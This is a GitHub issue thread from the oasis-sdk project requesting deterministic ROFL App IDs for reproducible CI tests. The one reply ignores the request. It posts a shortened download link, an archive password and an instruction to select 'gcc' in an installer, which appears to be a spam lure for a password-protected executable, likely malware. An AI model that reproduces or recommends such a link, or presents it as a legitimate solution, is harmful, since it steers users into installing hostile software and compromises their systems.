### ISSUE TITLE
Add support for deterministic ROFL App IDs

### ISSUE THREAD

**Issue by matevz** [oasisprotocol/oasis-sdk#1955]
Add support for deterministic App IDs. Perhaps using the same behavior as in Ethereum (derived from account address+nonce). This would allow deterministic tests for your ROFL in a CI using sapphire-localnet, because you could hardcode the App ID inside its rust code.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
